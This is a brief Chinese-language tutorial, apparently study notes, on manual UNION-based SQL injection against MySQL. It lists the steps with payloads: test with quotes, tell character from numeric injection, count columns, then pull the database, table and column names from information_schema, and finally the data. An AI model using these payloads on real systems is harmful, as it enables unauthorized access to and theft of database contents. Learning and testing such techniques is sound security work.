1.判断是否存在漏洞
用单引号或者双引号判断是否报错。若报错则存在sql注入漏洞
2.判断是字符型的还是数字型漏洞
输入
1' and 1=2#如果与原来只输入 1 的结果相同则是数字
3.判断select几列
用 order by
如果order by 被过滤了可以用group by
4.获取数据库名
假设这里select的是3列 然后需要自己在判断一下哪几位是回显位 然后用联合注入查询 数据库
1' union select 1,2,database()#5.获取数据库表名
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表, 表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际 上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果 取之此表。
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个
schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的 结果取之此表。
COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是
show columns from schemaname.tablename的结果取之此表。1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#6.获取表中的字段名
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='' and table_schema=database()#7.查询字段中的内容
1' union select group_concat(, , ) from biaoming#group_concat() 函数是让多行数据在一行显示 如果被过滤 可以利用
limit 0,1;
